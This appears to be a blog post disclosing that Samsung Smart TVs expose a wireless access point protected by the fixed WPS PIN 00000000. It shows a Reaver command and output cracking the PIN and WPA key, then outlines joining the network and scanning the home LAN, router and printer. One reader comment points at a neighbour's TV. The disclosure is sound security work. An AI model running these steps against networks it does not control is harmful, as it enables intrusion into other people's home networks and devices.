(Or wtf is SEC_Linkshare?)
Samsung Smart TVs have the ability to connect to other devices using wifi – you can turn this feature on in the Network settings on the TV.
This could, for instance allow you to use an iPhone app as a remote control for the TV or play a slideshow from your smartphone.
But if you enable this feature you’ll suddenly find a new wireless SSID in your area called SEC_Linkshare_xxxxxx.
This is your Samsung TV operating as a Wireless Access Point and it presents a massive security risk to your network.
To connect devices to the TV it uses Wireless Protected Setup (WPS) – a quick and easy way to pair wifi devices. However, hacking WPS devices became extremely easy in December 2011 when a tool called Reaver was released by Tactical Network Solutions, enabling anyone to discover the WPA password within a few hours on most WPS enabled routers. Samsung make this problem even worse with the Smart TV because it uses a WPS pin of 00000000 which of course is one of the first ones Reaper will try and so you can discover the SEC_Linkshare_xxxxxx WPA key in less than 10 seconds!
Here’s the output from Terminal showing Reaver hacking my TV in 5 seconds flat:
john@VIAO:~$ sudo reaver -i mon3 -b E4:E0:C5:05:D5:68 -vvReaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Waiting for beacon from E4:E0:C5:05:D5:68[+] Switching mon3 to channel 1[+] Associated with E4:E0:C5:05:D5:68 (ESSID: SEC_LinkShare_419a94)[+] Trying pin 12345670
[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin 00005678
[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin 00000000
[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Pin cracked in 5 seconds
[+] WPS PIN: '00000000'
[+] WPA PSK: 'ngYWQnHzxa86JxF9QOiWxrLn0eWa31'
[+] AP SSID: 'SEC_LinkShare_419a94'
john@VIAO:~$
Once a hacker knows the wifi password (WPA PSK) to the Samsung’s AP you will be able to join the network, see all other devices and browse the Internet.
Join the network using the discovered key.
Here you can see my MacBook using this connection.
DHCP will obtain an IP address from the TV (10.123.12.128 in this case) it’s on a different subnet to the LAN that the TV is connected to but nevertheless it routes through to the home LAN.
Scanning the network will show other devices:
It’s not possible to re-configure the AP or disable WPS so if you don’t want your neighbour on your broadband connection (or worse) I’d advise disabling the Samsung Wireless Link asap.
Here’s a demo of the iPhone connected to the Samsung TV – as you can see it gets IP address 10.123.12.128
Although the iPhone is on a different subnet to the TV’s LAN network you can still scan the LAN if you can guess the range.
Now we know what else is on the network we can scan for open ports, log into the broadband router or perhaps the printer’s webpage:
From there, some printers may even give access to previously printed jobs. As you can see this is a huge (poorly publicised*) security risk.
[The only other report I’ve found regarding this issue is here: http://www.oeioei.nl/internet/tvlek.php]
Further reading: http://steveshank.com/cgi-bin/article.pl?aid=373
Holy shit. I just saw it in the WPS spreadsheet. This is horrible.
i know its old. but the tv are still out there. like the one my neighbor has.
if you make a traceroute you can see the next gateway (router ip)
I believe there was an update that made it so a WPA2 key was required: WPA won’t cut it. I’m not sure if Reaver supports cracking WPA2.